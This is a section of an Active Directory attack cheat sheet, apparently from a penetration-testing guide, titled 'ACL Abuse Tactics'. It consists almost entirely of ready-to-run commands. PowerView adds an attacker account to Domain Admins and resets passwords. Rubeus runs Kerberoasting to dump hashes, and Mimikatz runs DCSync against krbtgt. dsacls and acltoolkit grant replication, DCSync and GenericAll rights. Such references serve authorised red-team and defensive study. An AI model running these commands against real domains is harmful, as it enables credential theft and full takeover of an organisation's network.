18. ACL Abuse Tactics

PowerShell (PowerView/Active Directory Module):

# Retrieve ACL for a user
Get-ObjectAcl -SamAccountName "targetuser" -ResolveGUIDs

# Add a user to the Domain Admins group
Add-DomainGroupMember -Identity "Domain Admins" -Members "attackeruser"

# Reset a user's password
Set-DomainUserPassword -Identity "targetuser" -AccountPassword (ConvertTo-SecureString "NewPassword" -AsPlainText -Force)

# Modify SPN for a user
Set-ADObject -Identity "targetuser" -Set @{servicePrincipalName="fake/spn"}

# Get user information
Get-ADUser targetuser

# Get group information
Get-ADGroup "groupname"

Rubeus:

# Perform Kerberoasting attack
Rubeus.exe kerberoast /spn:fake/spn /domain:domain.local /outfile:hashes.txt

Mimikatz:

# Perform DCSync attack to dump credentials
lsadump::dcsync /domain:domain.local /user:krbtgt

Windows Command Line:

# Grant replication rights to an attacker
Dsacls "DC=domain,DC=local" /grant "attackeruser:RPWP;user"

ACLToolkit:

# Grant GenericAll permissions to an attacker
acltoolkit.exe give-genericall -target "CN=targetuser,DC=domain,DC=local" -principal "attackeruser@domain.local"

# Grant DCSync rights to an attacker
acltoolkit.exe give-dcsync -target "DC=domain,DC=local" -principal "attackeruser@domain.local"

# Add an attacker to a group
acltoolkit.exe add-groupmember -target "CN=groupname,DC=domain,DC=local" -principal "attackeruser@domain.local"
Previous17. ACL EnumerationNext19. DCSync

Last updated